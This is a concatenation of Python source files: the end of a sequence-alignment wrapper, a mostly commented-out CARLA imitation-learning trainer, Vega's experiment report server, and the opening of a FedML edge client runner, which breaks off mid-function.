"@PG\tID:samtools\tPN:samtools\tVN:{version}\tCL:{cmd}\n".format(
version=samtools_version,
cmd=samtools_fastq_cmd,
).encode(
"utf-8"
)
)
for pg_line in local_pg_lines:
chain.append(pg_line)
for header_line in header_buffer:
sys.stdout.buffer.write(header_line)
for pg_line in chain:
sys.stdout.buffer.write(pg_line)
sys.stdout.buffer.write(line)
else:
sys.stdout.buffer.write(line)
thread_2 = Thread(target=thread_fn_2)
thread_2.start()
threads.append(thread_2)
for thread in threads:
thread.join()
else:
with self.aligner.run_process(
reference=self.reference,
stderr=logger_handle.add_logger(
logger.info, "reference alignment"
),
stdout=sys.stdout,
stdin=sys.stdin if self.reads_from_stdin else None,
) as process:
process.communicate()
def __str__(self):
return ";".join(
(
self.name,
self.reference,
str([str(site) for site in self.sites]),
)
)
@property
def hash(self):
return sum(
int(hashlib.sha256(string.encode("utf-8")).hexdigest(), 16)
for string in (
[basename(normpath(self.reference))]
+ [str(site) for site in self.sites]
)
) % (2 ** 64)
Aligner(
align=align,
aligner=aligner,
trim=trim,
reference=reference,
reads=reads,
sites=site,
threads=threads,
sam_tags=[t for tg in tag for t in tg.split()],
).run()
|
test.py
|
"""
Copyright (c) College of Mechatronics and Control Engineering, Shenzhen University.
All rights reserved.
Description :
train a imitaor using the carla standard control data.
Author:Team Li
"""
import tensorflow as tf
import numpy as np
import sys, glob, os
try:
sys.path.append(glob.glob('**/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
import carla
except:
raise ImportError('Please check your carla file')
from carla_utils.logging import logger
from carla_utils.world_ops import *
from carla_utils.sensor_ops import *
from RL.DDPG.ddpg_utils import actor
import RL.rl_utils as rl_tools
import threading
import math
import cv2
#
#
# tf.app.flags.DEFINE_string(
# 'checkpoint_dir', '',
# 'The path to a checkpoint from which to fine-tune.')
#
# tf.app.flags.DEFINE_string(
# 'train_dir', './checkpoint/imitator',
# 'Directory where checkpoints are written to.')
#
# tf.app.flags.DEFINE_integer(
# 'batch_size', 32, 'The number of samples in each batch.')
#
# tf.app.flags.DEFINE_float('learning_rate', 3e-2, 'Initial learning rate.')
#
# tf.app.flags.DEFINE_integer(
# 'f_log_step', 50,
# 'The frequency with which logs are print.')
#
# tf.app.flags.DEFINE_integer(
# 'f_save_step', 10000,
# 'The frequency with which summaries are saved, in step.')
#
# tf.app.flags.DEFINE_integer(
# 'img_height', 416,
# 'raw image height')
#
# tf.app.flags.DEFINE_integer(
# 'img_width', 626,
# 'raw image width')
#
# FLAGS = tf.app.flags.FLAGS
# slim = tf.contrib.slim
#
#
# bgr_camera_config = {'data_type': 'sensor.camera.rgb', 'image_size_x': FLAGS.img_width,
# 'image_size_y': FLAGS.img_height, 'fov': 110, 'sensor_tick': 0.02,
# 'transform': carla.Transform(carla.Location(x=1.0, z=1.8)),
# 'attach_to':None}
# collision_sensor_config = {'data_type': 'sensor.other.collision','attach_to': None}
# obstacle_sensor_config = {'data_type': 'sensor.other.obstacle', 'sensor_tick': 0.02,
# 'distance': 3, 'attach_to': None}
#
# light_state_encode = {'Green':np.array([1., 0., 0., 0.]).astype(np.float32),
# 'Red':np.array([0., 1., 0., 0.]).astype(np.float32),
# 'Yellow':np.array([0., 0., 1., 0.]).astype(np.float32),
# 'Unkown':np.array([0., 0., 0., 1.]).astype(np.float32)}
#
#
# def steer_scene_classify(steer):
# """generate the winding one-hot groundtruth"""
# if steer >= -1. and steer < -0.5:
# return 0, np.eye(1, 11, k=0)[0].astype(np.int32)
# elif steer >= -0.5 and steer < -0.2:
# return 1, np.eye(1, 11, k=1)[0].astype(np.int32)
# elif steer >= -0.2 and steer < -0.1:
# return 2, np.eye(1, 11, k=2)[0].astype(np.int32)
# elif steer >= -0.1 and steer < -0.05:
# return 3, np.eye(1, 11, k=3)[0].astype(np.int32)
# elif steer >= -0.05 and steer < 0.:
# return 4, np.eye(1, 11, k=4)[0].astype(np.int32)
# elif steer >= 0. and steer < 0.05:
# return 5, np.eye(1, 11, k=5)[0].astype(np.int32)
# elif steer >= 0.05 and steer < 0.1:
# return 6, np.eye(1, 11, k=6)[0].astype(np.int32)
# elif steer >= 0.1 and steer < 0.2:
# return 7, np.eye(1, 11, k=7)[0].astype(np.int32)
# elif steer >= 0.2 and steer < 0.5:
# return 8, np.eye(1, 11, k=8)[0].astype(np.int32)
# elif steer >= 0.5 and steer <= 1.:
# return 9, np.eye(1, 11, k=9)[0].astype(np.int32)
#
#
# def model(input, is_training):
# """user define model
# Args:
# input: an input tensor
# is_training: indicate whether train or not
# Return:
# output tensor of which the meaning is defined by user.
# in this script, means [steer, throttle, brake]
# """
# net = actor()
# scene_logits, action, net_vars = net.build_graph(input, other_state=other_state, n_action_space=3, is_training=is_training,
# action_range=[[-1., 1.], [0., 1.], [0., 1.]], var_scope='online_actor')
# return scene_logits, action
#
#
# def single_execuate(target, args):
# threading.Thread(target=target, args=args).start()
#
#
# def check_whether_respawn_actors(world, vehicles):
# """check whether to respawn the static acotors in a frequency"""
# while True:
# if carla_actors_static(vehicles, bigger_than=0.8):
# respawn_static_actors(world, vehicles)
# time.sleep(20)
#
#
# def sample_thread(sess):
# """a thread used to collect the data from carla"""
# begin = True
#
# ## set all the egopilots to autopilot and init whether_wait_red_light
# whether_wait_red_light = {}
# for egopilot in egopilots:
# whether_wait_red_light[egopilot] = False
# egopilot.set_autopilot(enabled=True)
#
#
# while True:
# for camera, obj_collision, egopilot in zip(cameras, obj_collisions, egopilots):
# img = camera.get()
# collision = obj_collision.get()
#
# if collision:
# obj_collision.clear()
# ## if collision skip this memory
# single_execuate(target=respawn_actors, args=(world, [egopilot],))
# continue
#
# # cv2.imshow('test', img)
#
# # img = img[FLAGS.img_height//2:, FLAGS.img_width//5:4*FLAGS.img_width//5, :] ## corp the ROI
# img = img*2./255. - 1.
# img = cv2.resize(img, dsize=(224, 224))
#
# std_steer = egopilot.get_control().steer
# std_throttle = egopilot.get_control().throttle
# std_brake = egopilot.get_control().brake
#
# scene_class, steer_scene_encode = steer_scene_classify(steer=std_steer)
#
# # if std_steer<0.05 and std_steer>-0.05:
# # a = random.uniform(0,1)
# # if a < 0.8:
# # continue
#
# ego_v = egopilot.get_velocity()
# ego_v_ = math.sqrt(ego_v.x ** 2 + ego_v.x ** 2 + ego_v.x ** 2)
# ego_v = ego_v_ / egopilot.get_speed_limit()
#
# if egopilot.is_at_traffic_light() and not whether_wait_red_light[egopilot]:
# ## mean first go into traffic light area
# if str(egopilot.get_traffic_light_state()) == 'Green':
# # print('Green, straght forward')
# scene_class = 10 ## mean straght forward
# elif str(egopilot.get_traffic_light_state()) == 'Red':
# # print('Red, Stop')
# whether_wait_red_light[egopilot] = True
# scene_class = 11 ## mean need to stop
# light_state = light_state_encode[str(egopilot.get_traffic_light_state())]
# elif whether_wait_red_light[egopilot]:
# if str(egopilot.get_traffic_light_state()) == 'Green':
# whether_wait_red_light[egopilot] = False
# # print('Red to Green, I can go now')
# std_throttle = 1.
# std_brake = 0.
# # print('throttle:', std_throttle)
# # print('brake:', std_brake)
# scene_class = 12 ## mean red to green
# elif str(egopilot.get_traffic_light_state()) == 'Red':
# print('Still Red, wait for green')
# whether_wait_red_light[egopilot] = True
# scene_class = 11 ## mean need to stop
# light_state = light_state_encode[str(egopilot.get_traffic_light_state())]
# else:
# if ego_v_ < 1e-3: ## imitate ahead obstcle
# steer_scene_encode = np.eye(1, 11, k=10)[0].astype(np.int32)
# # print("stop!!!")
# # else:
# # print('go forward')
# light_state = light_state_encode['Unkown']
#
# std_action = np.array([std_steer, std_throttle, std_brake])
# other_state = np.concatenate([light_state, np.array([ego_v])], axis=-1)
#
# memory_pool.put(memory=[img.astype(np.float32), other_state.astype(np.float32), std_action.astype(np.float32), steer_scene_encode],
# class_index=scene_class)
# cv2.waitKey(200)
# # time.sleep(0.2)
#
# if begin and memory_pool.is_balance():
# begin = False
# update_event.set()
#
#
# def update_thread(sess):
# """a thread used to train an actor net"""
# update_event.wait()
# logger.info('Begin update the actor...')
#
# avg_clf_loss = 0.
# avg_ops_loss = 0.
# current_step = 0
# while True:
# memorys = memory_pool.get(batch_size=FLAGS.batch_size)
# imgs = []
# other_states = []
# actions = []
# scene_labels = []
#
# # img = memorys[0][0]
# # img = np.uint8((img+1.)*255./2)
# # print('state:', memorys[0][1])
# # print('action:', memorys[0][2])
# #
# # cv2.imshow('test', img)
# # cv2.waitKey()
#
# for memory in memorys:
# imgs.append(memory[0])
# other_states.append(memory[1])
# actions.append(memory[2])
# scene_labels.append(memory[3])
#
# if current_step < 60000:
# op, clf_l, ops_l, current_step = sess.run([update_ops, clf_loss, ops_loss, global_step], feed_dict={input: np.array(imgs),
# other_state: np.array(
# other_states),
# std_action: np.array(
# actions),
# scene_label: np.array(
# scene_labels),
# lr:FLAGS.learning_rate})
# # op, net_loss, current_step = sess.run([update_ops, clf_loss, global_step], feed_dict={input: np.array(imgs),
# # scene_label:np.array(scene_labels),
# # lr: FLAGS.learning_rate})
# elif current_step < 120000:
# op, clf_l, ops_l, current_step = sess.run([update_ops, clf_loss, ops_loss, global_step], feed_dict={input: np.array(imgs),
# other_state: np.array(
# other_states),
# std_action: np.array(
# actions),
# scene_label: np.array(
# scene_labels),
# lr: FLAGS.learning_rate/10})
# # op, net_loss, current_step = sess.run([update_ops, clf_loss, global_step], feed_dict={input: np.array(imgs),
# # scene_label: np.array(
# # scene_labels),
# # lr: FLAGS.learning_rate/10})
# elif current_step < 8000000:
# op, clf_l, ops_l, current_step = sess.run([update_ops, clf_loss, ops_loss, global_step], feed_dict={input: np.array(imgs),
# other_state: np.array(other_states),
# std_action: np.array(actions),
# scene_label: np.array(scene_labels),
# lr: FLAGS.learning_rate/100})
# # op, net_loss, current_step = sess.run([update_ops, clf_loss, global_step], feed_dict={input: np.array(imgs),
# # scene_label: np.array(
# # scene_labels),
# # lr: FLAGS.learning_rate/100})
# else:
# break
#
# if FLAGS.f_log_step != None:
# ## caculate average loss ##
# step = current_step % FLAGS.f_log_step
# avg_ops_loss = (avg_ops_loss * step + ops_l) / (step + 1.)
# avg_clf_loss = (avg_clf_loss * step + clf_l) / (step + 1.)
# if current_step % FLAGS.f_log_step == FLAGS.f_log_step - 1:
# logger.info('Step%s ops_loss:%s clf_loss:%s' % (str(current_step), str(avg_ops_loss), str(avg_clf_loss)))
#
# if FLAGS.f_save_step != None:
# if current_step % FLAGS.f_save_step == FLAGS.f_save_step - 1:
# ## save model ##
# logger.info('Saving model...')
# model_name = os.path.join(FLAGS.train_dir, 'imitator.model')
# saver.save(sess, model_name)
# logger.info('Save model sucess...')
#
#
# if __name__ == '__main__':
# input = tf.placeholder(shape=[None, 224, 224, 3], dtype=tf.float32)
# other_state = tf.placeholder(shape=[None, 5], dtype=tf.float32)
# std_action = tf.placeholder(shape=[None, 3], dtype=tf.float32)
# scene_label = tf.placeholder(shape=[None, 11], dtype=tf.int32)
# global_step = tf.Variable(0, trainable=False, name='global_step')
# lr = tf.placeholder(dtype=tf.float32)
#
# ## TF GRAPH ##
# scene_logits, action = model(input, is_training=True)
#
# clf_loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=scene_label, logits=scene_logits))
#
# ops_loss = tf.reduce_sum(tf.square(action - std_action))
#
# loss = clf_loss + 100.*ops_loss
#
# ## UPDATE OPS ##
# bn_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
# with tf.control_dependencies(bn_ops):
# optimizer = tf.train.AdamOptimizer(learning_rate=lr, epsilon=1e-8)
# grads_and_vars = optimizer.compute_gradients(loss)
# ## clip the gradients ##
# capped_gvs = [(tf.clip_by_value(grad, -5., 5.), var)
# for grad, var in grads_and_vars if grad != None]
# update_ops = optimizer.apply_gradients(capped_gvs, global_step=global_step)
#
# init = tf.global_variables_initializer()
# saver = tf.train.Saver(tf.global_variables())
# ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
#
# logger.info('Build tensorflow graph finish...')
# logger.info('Total trainable parameters:%s' %
# str(np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])))
#
#
# #### carla world init ####
# client = carla.Client('127.0.0.1', 2000)
# client.set_timeout(10.0) # seconds
# logger.info('Carla connect success...')
#
# logger.info('Carla world initing...')
# world = client.get_world()
# destroy_all_actors(world)
#
# ## spawn vehicles in carla world
# spawn_vehicles(world, n_autopilots=100, n_egopilots=1)
# time.sleep(10)
#
# autopilots = get_all_autopilots(world)
# egopilots = get_all_egopilots(world)
#
# cameras = []
# obj_collisions = []
# logger.info('Adding some sensors to egopilots...')
# for egopilot in egopilots:
# ## attach a camera to egopilot ##
# bgr_camera_config['attach_to'] = egopilot
# bgr_sensor = bgr_camera(world, bgr_camera_config)
# cameras.append(bgr_sensor)
#
# ## attach collision sensor to egopilot ##
# collision_sensor_config['attach_to'] = egopilot
# collision_sensor = collision_query(world, collision_sensor_config)
# obj_collisions.append(collision_sensor)
#
#
# logger.info('Adding some sensors to egopilots success')
#
# # memory_pool = rl_tools.memory_pooling(maxlen=1000)
# memory_pool = rl_tools.balance_memory_pooling(max_capacity=1300, n_class=13)
# update_event = threading.Event()
#
# config = tf.ConfigProto()
# config.gpu_options.allow_growth = True
# with tf.Session(config=config) as sess:
# if ckpt:
# logger.info('loading %s...' % str(ckpt.model_checkpoint_path))
# saver.restore(sess, ckpt.model_checkpoint_path)
# logger.info('Load checkpoint success...')
# else:
# sess.run(init)
# logger.info('Actor variables init success...')
#
#
# s_t = threading.Thread(target=sample_thread, args=(sess,))
# u_t = threading.Thread(target=update_thread, args=(sess,))
# c_t = threading.Thread(target=check_whether_respawn_actors, args=(world, autopilots+egopilots,))
# s_t.daemon = True
# u_t.daemon = True
# c_t.daemon = True
# s_t.start()
# c_t.start()
#
# c_t.join()
# import math
#
# def gaussian_r(val, mu=65., sigma=30.):
# """calculate the reward of velocity
# Args:
# vel: velocity, km/h
# Return:
# a reward
# """
# # if vel > 80:
# # return 5.
#
# r = math.exp(-((val - mu) ** 2) / (2 * sigma ** 2))
# return r
#
#
# for i in range(-10, 10, 1):
# print(str(i/10)+' '+str(10 * (gaussian_r(i/10, mu=0., sigma=0.3)) - 5))
# spector_camera_config = {'data_type': 'sensor.camera.rgb', 'image_size_x': 626,
# 'image_size_y': 416, 'fov': 110, 'sensor_tick': 0.02,
# 'transform': carla.Transform(carla.Location(x=-6, z=3.5)),
# 'attach_to':None}
#
# def spawn(world, index=None):
# if not index:
# spawn_points = list(world.get_map().get_spawn_points())
# for i in range(len(spawn_points)):
# blueprints = world.get_blueprint_library().filter('vehicle.nissan.micra')
# blueprint = random.choice(blueprints)
# vehicle = world.try_spawn_actor(blueprint, spawn_points[i])
# print('i am in ', i)
# time.sleep(2)
# vehicle.destroy()
# else:
# spawn_points = list(world.get_map().get_spawn_points())
# blueprints = world.get_blueprint_library().filter('vehicle.nissan.micra')
# blueprint = random.choice(blueprints)
# vehicle = world.try_spawn_actor(blueprint, spawn_points[index])
# time.sleep(5)
# vehicle.destroy()
#
# client = carla.Client('127.0.0.1', 2000)
# client.set_timeout(10.0) # seconds
# logger.info('Carla connect success...')
#
# logger.info('Carla world initing...')
# world = client.get_world()
# destroy_all_actors(world)
#
# spawn_points = list(world.get_map().get_spawn_points())
#
# egopilot = spawn_egopilot_at(world, spawn_points[0])
# # obstacle_aheads = []
# logger.info('Adding some sensors to egopilots...')
#
# spector_camera_config['attach_to'] = egopilot
# spector = bgr_camera(world, spector_camera_config)
# time.sleep(2)
#
# for i, spawn_point in enumerate(spawn_points):
# respawn_actor_at(world, egopilot, spawn_point)
# time.sleep(1)
#
# sp_img = spector.get()
# sp_img = cv2.putText(sp_img, str(spawn_point.rotation), (10, 80), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 5)
#
# # cv2.imshow('vis', sp_img)
# # print(str(i)+' '+ str(spawn_point))
# # cv2.waitKey(2000)
# # cv2.destroyAllWindows()
#
# cv2.imwrite('./img/'+str(i)+'.jpg', sp_img)
# pass
# import tensorflow as tf
#
# x = tf.Variable(100.)
# e = tf.exp(x)
# y = tf.log(1+e)
# dy = tf.gradients(y,x)
# with tf.Session() as sess:
# sess.run(tf.global_variables_initializer())
# print(sess.run(dy))
print(2**3)
|
report_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Report."""
import json
import logging
import os
import glob
import pickle
import time
import random
from copy import deepcopy
import numpy as np
import pandas as pd
from threading import Lock
from collections import OrderedDict
from threading import Thread
import vega
from vega.common import FileOps, TaskOps
from vega.common.general import General
from .record import ReportRecord
from .report_persistence import ReportPersistence
from vega.common import MessageServer
from vega.common.utils import singleton
from vega.common.pareto_front import get_pareto_index
__all__ = ["ReportServer"]
logger = logging.getLogger(__name__)
_records_lock = Lock()
_modified = False
@singleton
class ReportServer(object):
"""Report server."""
def __init__(self):
self._hist_records = OrderedDict()
self.persistence = ReportPersistence()
self._start_save_report_thread()
self.old_not_finished_workers = []
def run(self):
"""Run report server."""
MessageServer().register_handler("query_report", query_report)
MessageServer().register_handler("update_record", update_record)
MessageServer().register_handler("get_record", get_record)
@property
def all_records(self):
"""Get all records."""
return deepcopy(list(self._hist_records.values()))
def print_best(self, step_name):
"""Print best performance and desc."""
records = self.get_pareto_front_records(step_name)
return [dict(worker_id=record.worker_id, performance=record._performance) for record in records]
def pareto_front(self, step_name=None, nums=None, records=None):
"""Get parent front. pareto."""
if records is None:
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.performance is not None, records))
records = [record for record in records if record.rewards_compeleted]
if not records:
return None, None
try:
rewards = [record.rewards if isinstance(record.rewards, list) else [record.rewards] for record in records]
indexes = get_pareto_index(np.array(rewards)).tolist()
return [record for i, record in enumerate(records) if indexes[i]]
except Exception as ex:
logging.error('No pareto_front_records found, ex=%s', ex)
return []
def get_step_records(self, step_name=None):
"""Get step records."""
if not step_name:
step_name = General.step_name
records = self.all_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps, records))
return records
def get_record(self, step_name, worker_id):
"""Get records by step name and worker id."""
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.worker_id == worker_id, records))
return records[0]
def get_last_record(self):
"""Get last records."""
if not self.all_records:
return None
return self.all_records[-1]
def get_pareto_front_records(self, step_name=None, nums=None, selected_key=None, choice=None):
"""Get Pareto Front Records."""
if not step_name:
step_name = General.step_name
records = self.all_records
if selected_key is not None:
new_records = []
selected_key.sort()
for record in records:
record._objective_keys.sort()
if record._objective_keys == selected_key:
new_records.append(record)
records = new_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps and x.performance is not None, records))
if records:
not_finished = [x.worker_id for x in records if not x.rewards_compeleted]
records = [x for x in records if x.rewards_compeleted]
if not_finished and set(not_finished) != set(self.old_not_finished_workers):
self.old_not_finished_workers = not_finished
logging.info(f"waiting for the workers {str(not_finished)} to finish")
if not records:
return []
pareto = self.pareto_front(step_name, nums, records=records)
if not pareto:
return []
if choice is not None:
return [random.choice(pareto)]
else:
return pareto
@classmethod
def restore(cls):
"""Transfer cvs_file to records."""
step_path = TaskOps().step_path
_file = os.path.join(step_path, ".reports")
if os.path.exists(_file):
with open(_file, "rb") as f:
data = pickle.load(f)
cls._hist_records = data[0]
cls.__instances__ = data[1]
def backup_output_path(self):
"""Back up output to local path."""
backup_path = TaskOps().backup_base_path
if backup_path is None:
return
FileOps.copy_folder(TaskOps().local_output_path, backup_path)
def output_pareto_front(self, step_name):
"""Save one records."""
logging.debug("All records in report, records={}".format(self.all_records))
records = deepcopy(self.get_pareto_front_records(step_name))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump pareto front records, report is emplty.")
return
self._output_records(step_name, records)
def output_step_all_records(self, step_name):
"""Output step all records."""
records = self.all_records
logging.debug("All records in report, records={}".format(self.all_records))
records = list(filter(lambda x: x.step_name == step_name, records))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump records, report is emplty.")
return
self._output_records(step_name, records)
def _output_records(self, step_name, records):
"""Dump records."""
columns = ["worker_id", "performance", "desc"]
outputs = []
for record in records:
record = record.serialize()
_record = {}
for key in columns:
_record[key] = record[key]
outputs.append(deepcopy(_record))
data = pd.DataFrame(outputs)
step_path = FileOps.join_path(TaskOps().local_output_path, step_name)
FileOps.make_dir(step_path)
_file = FileOps.join_path(step_path, "output.csv")
try:
data.to_csv(_file, index=False)
except Exception:
logging.error("Failed to save output file, file={}".format(_file))
for record in outputs:
worker_id = record["worker_id"]
worker_path = TaskOps().get_local_worker_path(step_name, worker_id)
outputs_globs = []
outputs_globs += glob.glob(FileOps.join_path(worker_path, "desc_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "hps_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "model_*"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "performance_*.json"))
for _file in outputs_globs:
if os.path.isfile(_file):
FileOps.copy_file(_file, step_path)
elif os.path.isdir(_file):
FileOps.copy_folder(_file, FileOps.join_path(step_path, os.path.basename(_file)))
def set_step_names(self, step_names):
"""Add step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.set_step_names(step_names)
def update_step_info(self, **kwargs):
"""Update step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.update_step_info(**kwargs)
def __repr__(self):
"""Override repr function."""
return str(self.all_records)
@classmethod
def load_records_from_model_folder(cls, model_folder):
"""Transfer json_file to records."""
if not model_folder or not os.path.exists(model_folder):
logging.error("Failed to load records from model folder, folder={}".format(model_folder))
return []
records = []
pattern_model_desc = FileOps.join_path(model_folder, "desc_*.json")
pattern_hps = FileOps.join_path(model_folder, "hps_*.json")
model_desc_files = glob.glob(pattern_model_desc)
hps_files = glob.glob(pattern_hps)
for _file in model_desc_files:
try:
with open(_file) as f:
desc = json.load(f)
worker_id = _file.split(".")[-2].split("_")[-1]
weights_file = os.path.join(os.path.dirname(_file), "model_{}".format(worker_id))
if vega.is_torch_backend():
weights_file = '{}.pth'.format(weights_file)
elif vega.is_ms_backend():
weights_file = '{}.ckpt'.format(weights_file)
if not os.path.exists(weights_file):
weights_file = None
hps_file = os.path.join(os.path.dirname(_file), os.path.basename(_file).replace("desc_", "hps_"))
hps = None
if hps_file in hps_files:
hps = cls._load_hps(hps_file)
hps_files.remove(hps_file)
sample = dict(worker_id=worker_id, desc=desc, weights_file=weights_file, hps=hps)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
if len(hps_files) > 0:
for _file in hps_files:
try:
hps = None
hps = cls._load_hps(hps_file)
sample = dict(worker_id=worker_id, hps=hps)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
return records
@classmethod
def _load_hps(cls, hps_file):
with open(hps_file) as f:
hps = json.load(f)
if "trainer" in hps:
if "epochs" in hps["trainer"]:
hps["trainer"].pop("epochs")
if "checkpoint_path" in hps["trainer"]:
hps["trainer"].pop("checkpoint_path")
return hps
def _start_save_report_thread(self):
_thread = Thread(target=_dump_report, args=(self, self.persistence,))
_thread.daemon = True
_thread.start()
def update_record(step_name=None, worker_id=None, **kwargs):
"""Update record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "request message missing step_name or worker id."}
kwargs["step_name"] = step_name
kwargs["worker_id"] = worker_id
uid = "{}_{}".format(step_name, worker_id)
global _records_lock, _modified
with _records_lock:
_modified = True
records = ReportServer()._hist_records
if uid in records:
records[uid].load_dict(kwargs)
logging.debug("update record: {}".format(records[uid].to_dict()))
else:
records[uid] = ReportRecord().load_dict(kwargs)
logging.debug("new record: {}".format(records[uid].to_dict()))
return {"result": "success", "data": records[uid].to_dict()}
def get_record(step_name=None, worker_id=None, **kwargs):
"""Get record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "require message missing step_name or worker id."}
global _records_lock, _modified
with _records_lock:
uid = "{}_{}".format(step_name, worker_id)
records = ReportServer()._hist_records
if uid in records:
data = records[uid].to_dict()
else:
data = ReportRecord().to_dict()
return {"result": "success", "data": data}
def _dump_report(report_server, persistence):
while True:
time.sleep(1)
global _records_lock, _modified
with _records_lock:
if not _modified:
continue
all_records = report_server.all_records
_modified = False
try:
persistence.save_report(all_records)
# TODO
# persistence.pickle_report(report_server._hist_records, report_server.__instances__)
report_server.backup_output_path()
except Exception as e:
logging.warning(f"Failed to dump reports, message={str(e)}")
def query_report():
global _records_lock
with _records_lock:
all_records = ReportServer().all_records
return ReportServer().persistence.get_report(all_records)
|
client_runner.py
|
import json
import multiprocessing
import os
import platform
import re
import shutil
import signal
import stat
import subprocess
import time
import traceback
import urllib
import uuid
import zipfile
from os.path import expanduser
import psutil
import requests
import yaml
from fedml.cli.edge_deployment.mqtt_manager import MqttManager
from fedml.cli.comm_utils.yaml_utils import load_yaml_config
from fedml.core.mlops import MLOpsMetrics
import click
from fedml.core.mlops.mlops_configs import MLOpsConfigs
LOCAL_HOME_RUNNER_DIR_NAME = 'fedml-client'
LOCAL_RUNNER_INFO_DIR_NAME = 'runner_infos'
LOCAL_PACKAGE_HOME_DIR_NAME = "fedml_packages"
class FedMLClientRunner:
def __init__(self, args, edge_id=0, request_json=None, agent_config=None):
self.current_training_status = None
self.mqtt_mgr = None
self.client_mqtt_mgr = None
self.edge_id = edge_id
self.process = None
self.args = args
self.request_json = request_json
self.version = args.version
self.device_id = args.device_id
self.cloud_region = args.cloud_region
self.cur_dir = os.path.split(os.path.realpath(__file__))[0]
if args.current_running_dir is not None:
self.cur_dir = args.current_running_dir
self.sudo_cmd = ""
self.is_mac = False
if platform.system() == "Darwin":
self.is_mac = True
self.agent_config = agent_config
self.fedml_data_base_package_dir = os.path.join("/", "fedml", "data")
self.fedml_data_local_package_dir = os.path.join("/", "fedml", "fedml-package", "fedml", "data")
self.fedml_data_dir = self.fedml_data_base_package_dir
self.fedml_config_dir = os.path.join("/", "fedml", "conf")
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES = {"${FEDSYS.RUN_ID}": "",
"${FEDSYS.PRIVATE_LOCAL_DATA}": "",
"${FEDSYS.CLIENT_ID_LIST}": "",
"${FEDSYS.SYNTHETIC_DATA_URL}": "",
"${FEDSYS.IS_USING_LOCAL_DATA}": "",
"${FEDSYS.CLIENT_NUM}": "",
"${FEDSYS.CLIENT_INDEX}": "",
"${FEDSYS.CLIENT_OBJECT_LIST}": "",
"${FEDSYS.LOG_SERVER_URL}": ""}
self.mlops_metrics = None
click.echo("Current directory of client agent: " + self.cur_dir)
@staticmethod
def generate_yaml_doc(run_config_object, yaml_file):
try:
file = open(yaml_file, 'w', encoding='utf-8')
yaml.dump(run_config_object, file)
file.close()
except Exception as e:
click.echo("Generate yaml file.")
def build_dynamic_constrain_variables(self, run_id, run_config):
data_config = run_config["data_config"]
server_edge_id_list = self.request_json["edgeids"]
local_edge_id_list = [1]
local_edge_id_list[0] = self.edge_id
is_using_local_data = 0
private_data_dir = data_config["privateLocalData"]
synthetic_data_url = data_config["syntheticDataUrl"]
edges = self.request_json["edges"]
# if private_data_dir is not None \
# and len(str(private_data_dir).strip(' ')) > 0:
# is_using_local_data = 1
if private_data_dir is None or len(str(private_data_dir).strip(' ')) <= 0:
params_config = run_config.get("parameters", None)
private_data_dir = FedMLClientRunner.get_data_dir()
if synthetic_data_url is None or len(str(synthetic_data_url)) <= 0:
synthetic_data_url = private_data_dir
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.RUN_ID}"] = run_id
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.PRIVATE_LOCAL_DATA}"] = private_data_dir.replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_ID_LIST}"] = str(local_edge_id_list).replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.SYNTHETIC_DATA_URL}"] = synthetic_data_url.replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.IS_USING_LOCAL_DATA}"] = str(is_using_local_data)
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_NUM}"] = len(server_edge_id_list)
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_INDEX}"] = server_edge_id_list.index(self.edge_id) + 1
client_objects = str(json.dumps(edges))
client_objects = client_objects.replace(" ", "").replace("\n", "").replace('"', '\\"')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_OBJECT_LIST}"] = client_objects
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.LOG_SERVER_URL}"] = self.agent_config["ml_ops_config"][
"LOG_SERVER_URL"]
def unzip_file(self, zip_file, unzip_file_path):
result = False
if zipfile.is_zipfile(zip_file):
with zipfile.ZipFile(zip_file, 'r') as zipf:
zipf.extractall(unzip_file_path)
result = True
return result
def retrieve_and_unzip_package(self, package_name, package_url):
local_package_path = FedMLClientRunner.get_package_download_dir()
try:
os.makedirs(local_package_path)
except Exception as e:
click.echo("make dir")
local_package_file = os.path.join(local_package_path, os.path.basename(package_url))
if not os.path.exists(local_package_file):
